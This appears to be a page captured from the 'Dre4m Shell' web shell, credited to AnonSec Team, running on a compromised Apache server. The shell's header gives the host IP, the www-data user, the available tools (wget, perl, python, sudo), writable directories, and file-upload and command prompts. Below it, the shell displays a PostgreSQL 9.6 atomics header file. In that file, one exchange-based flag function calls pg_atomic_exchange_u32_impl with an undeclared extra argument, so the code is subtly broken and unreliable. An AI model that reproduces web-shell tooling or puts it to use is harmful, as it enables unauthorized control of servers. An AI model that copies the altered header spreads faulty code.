Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.223.239.65
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/2/task/2/root/proc/2/cwd/usr/include/postgresql/9.6/server/port/atomics/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/2/task/2/root/proc/2/cwd/usr/include/postgresql/9.6/server/port/atomics/generic.h
/*-------------------------------------------------------------------------
 *
 * generic.h
 *	  Implement higher level operations based on some lower level atomic
 *	  operations.
 *
 * Portions Copyright (c) 1996-2016, PostgreSQL Global Development Group
 * Portions Copyright (c) 1994, Regents of the University of California
 *
 * src/include/port/atomics/generic.h
 *
 *-------------------------------------------------------------------------
 */

/* intentionally no include guards, should only be included by atomics.h */
#ifndef INSIDE_ATOMICS_H
#	error "should be included via atomics.h"
#endif

/*
 * If read or write barriers are undefined, we upgrade them to full memory
 * barriers.
 */
#if !defined(pg_read_barrier_impl)
#	define pg_read_barrier_impl pg_memory_barrier_impl
#endif
#if !defined(pg_write_barrier_impl)
#	define pg_write_barrier_impl pg_memory_barrier_impl
#endif

#ifndef PG_HAVE_SPIN_DELAY
#define PG_HAVE_SPIN_DELAY
#define pg_spin_delay_impl()	((void)0)
#endif


/* provide fallback */
#if !defined(PG_HAVE_ATOMIC_FLAG_SUPPORT) && defined(PG_HAVE_ATOMIC_U32_SUPPORT)
#define PG_HAVE_ATOMIC_FLAG_SUPPORT
typedef pg_atomic_uint32 pg_atomic_flag;
#endif

#ifndef PG_HAVE_ATOMIC_READ_U32
#define PG_HAVE_ATOMIC_READ_U32
static inline uint32
pg_atomic_read_u32_impl(volatile pg_atomic_uint32 *ptr)
{
	return *(&ptr->value);
}
#endif

#ifndef PG_HAVE_ATOMIC_WRITE_U32
#define PG_HAVE_ATOMIC_WRITE_U32
static inline void
pg_atomic_write_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 val)
{
	ptr->value = val;
}
#endif

#ifndef PG_HAVE_ATOMIC_UNLOCKED_WRITE_U32
#define PG_HAVE_ATOMIC_UNLOCKED_WRITE_U32
static inline void
pg_atomic_unlocked_write_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 val)
{
	ptr->value = val;
}
#endif

/*
 * provide fallback for test_and_set using atomic_exchange if available
 */
#if !defined(PG_HAVE_ATOMIC_TEST_SET_FLAG) && defined(PG_HAVE_ATOMIC_EXCHANGE_U32)

#define PG_HAVE_ATOMIC_INIT_FLAG
static inline void
pg_atomic_init_flag_impl(volatile pg_atomic_flag *ptr)
{
	pg_atomic_write_u32_impl(ptr, 0);
}

#define PG_HAVE_ATOMIC_TEST_SET_FLAG
static inline bool
pg_atomic_test_set_flag_impl(volatile pg_atomic_flag *ptr)
{
	return pg_atomic_exchange_u32_impl(ptr, &value, 1) == 0;
}

#define PG_HAVE_ATOMIC_UNLOCKED_TEST_FLAG
static inline bool
pg_atomic_unlocked_test_flag_impl(volatile pg_atomic_flag *ptr)
{
	return pg_atomic_read_u32_impl(ptr) == 0;
}


#define PG_HAVE_ATOMIC_CLEAR_FLAG
static inline void
pg_atomic_clear_flag_impl(volatile pg_atomic_flag *ptr)
{
	/* XXX: release semantics suffice? */
	pg_memory_barrier_impl();
	pg_atomic_write_u32_impl(ptr, 0);
}

/*
 * provide fallback for test_and_set using atomic_compare_exchange if
 * available.
 */
#elif !defined(PG_HAVE_ATOMIC_TEST_SET_FLAG) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)

#define PG_HAVE_ATOMIC_INIT_FLAG
static inline void
pg_atomic_init_flag_impl(volatile pg_atomic_flag *ptr)
{
	pg_atomic_write_u32_impl(ptr, 0);
}

#define PG_HAVE_ATOMIC_TEST_SET_FLAG
static inline bool
pg_atomic_test_set_flag_impl(volatile pg_atomic_flag *ptr)
{
	uint32 value = 0;
	return pg_atomic_compare_exchange_u32_impl(ptr, &value, 1);
}

#define PG_HAVE_ATOMIC_UNLOCKED_TEST_FLAG
static inline bool
pg_atomic_unlocked_test_flag_impl(volatile pg_atomic_flag *ptr)
{
	return pg_atomic_read_u32_impl(ptr) == 0;
}

#define PG_HAVE_ATOMIC_CLEAR_FLAG
static inline void
pg_atomic_clear_flag_impl(volatile pg_atomic_flag *ptr)
{
	/*
	 * Use a memory barrier + plain write if we have a native memory
	 * barrier. But don't do so if memory barriers use spinlocks - that'd lead
	 * to circularity if flags are used to implement spinlocks.
	 */
#ifndef PG_HAVE_MEMORY_BARRIER_EMULATION
	/* XXX: release semantics suffice? */
	pg_memory_barrier_impl();
	pg_atomic_write_u32_impl(ptr, 0);
#else
	uint32 value = 1;
	pg_atomic_compare_exchange_u32_impl(ptr, &value, 0);
#endif
}

#elif !defined(PG_HAVE_ATOMIC_TEST_SET_FLAG)
#	error "No pg_atomic_test_and_set provided"
#endif /* !defined(PG_HAVE_ATOMIC_TEST_SET_FLAG) */


#ifndef PG_HAVE_ATOMIC_INIT_U32
#define PG_HAVE_ATOMIC_INIT_U32
static inline void
pg_atomic_init_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 val_)
{
	ptr->value = val_;
}
#endif

#if !defined(PG_HAVE_ATOMIC_EXCHANGE_U32) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)
#define PG_HAVE_ATOMIC_EXCHANGE_U32
static inline uint32
pg_atomic_exchange_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 xchg_)
{
	uint32 old;
	while (true)
	{
		old = pg_atomic_read_u32_impl(ptr);
		if (pg_atomic_compare_exchange_u32_impl(ptr, &old, xchg_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_ADD_U32) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)
#define PG_HAVE_ATOMIC_FETCH_ADD_U32
static inline uint32
pg_atomic_fetch_add_u32_impl(volatile pg_atomic_uint32 *ptr, int32 add_)
{
	uint32 old;
	while (true)
	{
		old = pg_atomic_read_u32_impl(ptr);
		if (pg_atomic_compare_exchange_u32_impl(ptr, &old, old + add_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_SUB_U32) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)
#define PG_HAVE_ATOMIC_FETCH_SUB_U32
static inline uint32
pg_atomic_fetch_sub_u32_impl(volatile pg_atomic_uint32 *ptr, int32 sub_)
{
	return pg_atomic_fetch_add_u32_impl(ptr, -sub_);
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_AND_U32) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)
#define PG_HAVE_ATOMIC_FETCH_AND_U32
static inline uint32
pg_atomic_fetch_and_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 and_)
{
	uint32 old;
	while (true)
	{
		old = pg_atomic_read_u32_impl(ptr);
		if (pg_atomic_compare_exchange_u32_impl(ptr, &old, old & and_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_OR_U32) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U32)
#define PG_HAVE_ATOMIC_FETCH_OR_U32
static inline uint32
pg_atomic_fetch_or_u32_impl(volatile pg_atomic_uint32 *ptr, uint32 or_)
{
	uint32 old;
	while (true)
	{
		old = pg_atomic_read_u32_impl(ptr);
		if (pg_atomic_compare_exchange_u32_impl(ptr, &old, old | or_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_ADD_FETCH_U32) && defined(PG_HAVE_ATOMIC_FETCH_ADD_U32)
#define PG_HAVE_ATOMIC_ADD_FETCH_U32
static inline uint32
pg_atomic_add_fetch_u32_impl(volatile pg_atomic_uint32 *ptr, int32 add_)
{
	return pg_atomic_fetch_add_u32_impl(ptr, add_) + add_;
}
#endif

#if !defined(PG_HAVE_ATOMIC_SUB_FETCH_U32) && defined(PG_HAVE_ATOMIC_FETCH_SUB_U32)
#define PG_HAVE_ATOMIC_SUB_FETCH_U32
static inline uint32
pg_atomic_sub_fetch_u32_impl(volatile pg_atomic_uint32 *ptr, int32 sub_)
{
	return pg_atomic_fetch_sub_u32_impl(ptr, sub_) - sub_;
}
#endif

#ifdef PG_HAVE_ATOMIC_U64_SUPPORT

#if !defined(PG_HAVE_ATOMIC_EXCHANGE_U64) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U64)
#define PG_HAVE_ATOMIC_EXCHANGE_U64
static inline uint64
pg_atomic_exchange_u64_impl(volatile pg_atomic_uint64 *ptr, uint64 xchg_)
{
	uint64 old;
	while (true)
	{
		old = ptr->value;
		if (pg_atomic_compare_exchange_u64_impl(ptr, &old, xchg_))
			break;
	}
	return old;
}
#endif

#ifndef PG_HAVE_ATOMIC_WRITE_U64
#define PG_HAVE_ATOMIC_WRITE_U64
static inline void
pg_atomic_write_u64_impl(volatile pg_atomic_uint64 *ptr, uint64 val)
{
	/*
	 * 64 bit writes aren't safe on all platforms. In the generic
	 * implementation implement them as an atomic exchange.
	 */
	pg_atomic_exchange_u64_impl(ptr, val);
}
#endif

#ifndef PG_HAVE_ATOMIC_READ_U64
#define PG_HAVE_ATOMIC_READ_U64
static inline uint64
pg_atomic_read_u64_impl(volatile pg_atomic_uint64 *ptr)
{
	uint64 old = 0;

	/*
	 * 64 bit reads aren't safe on all platforms. In the generic
	 * implementation implement them as a compare/exchange with 0. That'll
	 * fail or succeed, but always return the old value. Possible might store
	 * a 0, but only if the prev. value also was a 0 - i.e. harmless.
	 */
	pg_atomic_compare_exchange_u64_impl(ptr, &old, 0);

	return old;
}
#endif

#ifndef PG_HAVE_ATOMIC_INIT_U64
#define PG_HAVE_ATOMIC_INIT_U64
static inline void
pg_atomic_init_u64_impl(volatile pg_atomic_uint64 *ptr, uint64 val_)
{
	ptr->value = val_;
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_ADD_U64) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U64)
#define PG_HAVE_ATOMIC_FETCH_ADD_U64
static inline uint64
pg_atomic_fetch_add_u64_impl(volatile pg_atomic_uint64 *ptr, int64 add_)
{
	uint64 old;
	while (true)
	{
		old = pg_atomic_read_u64_impl(ptr);
		if (pg_atomic_compare_exchange_u64_impl(ptr, &old, old + add_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_SUB_U64) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U64)
#define PG_HAVE_ATOMIC_FETCH_SUB_U64
static inline uint64
pg_atomic_fetch_sub_u64_impl(volatile pg_atomic_uint64 *ptr, int64 sub_)
{
	return pg_atomic_fetch_add_u64_impl(ptr, -sub_);
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_AND_U64) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U64)
#define PG_HAVE_ATOMIC_FETCH_AND_U64
static inline uint64
pg_atomic_fetch_and_u64_impl(volatile pg_atomic_uint64 *ptr, uint64 and_)
{
	uint64 old;
	while (true)
	{
		old = pg_atomic_read_u64_impl(ptr);
		if (pg_atomic_compare_exchange_u64_impl(ptr, &old, old & and_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_FETCH_OR_U64) && defined(PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U64)
#define PG_HAVE_ATOMIC_FETCH_OR_U64
static inline uint64
pg_atomic_fetch_or_u64_impl(volatile pg_atomic_uint64 *ptr, uint64 or_)
{
	uint64 old;
	while (true)
	{
		old = pg_atomic_read_u64_impl(ptr);
		if (pg_atomic_compare_exchange_u64_impl(ptr, &old, old | or_))
			break;
	}
	return old;
}
#endif

#if !defined(PG_HAVE_ATOMIC_ADD_FETCH_U64) && defined(PG_HAVE_ATOMIC_FETCH_ADD_U64)
#define PG_HAVE_ATOMIC_ADD_FETCH_U64
static inline uint64
pg_atomic_add_fetch_u64_impl(volatile pg_atomic_uint64 *ptr, int64 add_)
{
	return pg_atomic_fetch_add_u64_impl(ptr, add_) + add_;
}
#endif

#if !defined(PG_HAVE_ATOMIC_SUB_FETCH_U64) && defined(PG_HAVE_ATOMIC_FETCH_SUB_U64)
#define PG_HAVE_ATOMIC_SUB_FETCH_U64
static inline uint64
pg_atomic_sub_fetch_u64_impl(volatile pg_atomic_uint64 *ptr, int64 sub_)
{
	return pg_atomic_fetch_sub_u64_impl(ptr, sub_) - sub_;
}
#endif

#endif /* PG_HAVE_ATOMIC_COMPARE_EXCHANGE_U64 */

Anon7 - 2022
AnonSec Team